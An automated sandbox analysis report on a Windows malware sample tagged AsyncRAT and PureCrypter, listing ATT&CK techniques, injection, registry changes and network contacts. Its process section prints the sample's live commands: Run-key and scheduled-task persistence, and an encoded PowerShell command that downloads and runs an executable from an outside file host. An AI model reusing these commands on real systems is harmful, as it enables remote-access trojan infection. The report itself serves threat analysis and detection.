Malware Analysis Report

2024-08-06 13:14

Sample ID 240615-m3hhks1hmk
Target 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68
SHA256 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68
Tags
asyncrat purecrypter downloader execution loader persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68

Threat Level: Known bad

The file 0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68 was found to be: Known bad.

Malicious Activity Summary

asyncrat purecrypter downloader execution loader persistence rat

Detect PureCrypter injector

PureCrypter

AsyncRat

Modifies WinLogon for persistence

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Command and Scripting Interpreter: PowerShell

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Scheduled Task/Job
T1053
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Winlogon Helper DLL
T1547.004
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Winlogon Helper DLL
T1547.004
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-15 10:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-15 10:59

Reported

2024-06-15 11:01

Platform

win10v2004-20240508-en

Max time kernel

114s

Max time network

112s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe"

Signatures

AsyncRat

rat asyncrat

Detect PureCrypter injector

loader
Description Indicator Process Target
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Ltntuhk\\Zmluvhyw.exe\"," C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A

PureCrypter

loader downloader purecrypter

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurtyService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurtyService\\SecurtyService.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4976 set thread context of 1700 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 60 set thread context of 4840 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\System32\Taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\Taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\System32\Taskmgr.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 60 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 60 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 60 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 4380 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4380 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4380 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 60 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 60 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 60 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 1528 wrote to memory of 1892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1528 wrote to memory of 1892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1528 wrote to memory of 1892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 60 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe
PID 60 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe
PID 60 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe
PID 4296 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE
PID 4296 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE
PID 4296 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE
PID 4296 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE
PID 4296 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE
PID 4976 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\cmd.exe
PID 4976 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\cmd.exe
PID 4976 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\cmd.exe
PID 1800 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1800 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4976 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4976 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4976 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4976 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4976 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4976 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4976 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 4480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3384 wrote to memory of 4480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3384 wrote to memory of 4480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 60 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 60 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 60 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 60 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 60 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 60 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 60 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 60 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe

"C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /nobreak /t 20

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 20

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3768,i,14486271492189381216,15799931579469722648,262144 --variations-seed-version --mojo-platform-channel-handle=4552 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 40

C:\Windows\SysWOW64\timeout.exe

timeout 40

C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

"C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe"

C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

"C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE"

C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

"C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService' -Value '"C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcQBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBiAGkAbgAyAC4AYQB3AHMALgBhAHQAcwBpAGcAbgAuAGMAbABvAHUAZAAvADkAMwBpADMAbwBuADEAZAAzAGYAdABhADgAaQBqAGgALwBkAGMAXwBjAHIAeQBwAHQALgBlAHgAZQAnACwAIAA8ACMAYgBxAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHkAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAG4AeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFMAZQBjAHUAcgB0AHkALgBlAHgAZQAnACkAKQA8ACMAaABjAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeABuAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAaABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQA8ACMAaQBhAGsAIwA+AA=="

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\System32\Taskmgr.exe

"C:\Windows\System32\Taskmgr.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
AZ 217.64.31.3:8808 tcp
AZ 217.64.31.3:8808 tcp
AZ 217.64.31.3:8437 tcp
US 8.8.8.8:53 filebin2.aws.atsign.cloud udp
AZ 217.64.31.3:8808 tcp

Files

memory/60-0-0x0000000074B9E000-0x0000000074B9F000-memory.dmp

memory/60-1-0x0000000000A70000-0x0000000000AF2000-memory.dmp

memory/60-2-0x0000000005B80000-0x0000000006124000-memory.dmp

memory/60-3-0x00000000054D0000-0x0000000005562000-memory.dmp

memory/60-4-0x0000000074B90000-0x0000000075340000-memory.dmp

memory/60-5-0x0000000005580000-0x000000000558A000-memory.dmp

memory/60-6-0x0000000006730000-0x00000000067A4000-memory.dmp

memory/60-7-0x00000000067A0000-0x00000000067EC000-memory.dmp

memory/60-8-0x0000000074B9E000-0x0000000074B9F000-memory.dmp

memory/60-9-0x0000000074B90000-0x0000000075340000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

MD5 1a9c46f2b4420d156a82f160facf9376
SHA1 ce91faa7353cb4d3411b20a69350f27a6fe47990
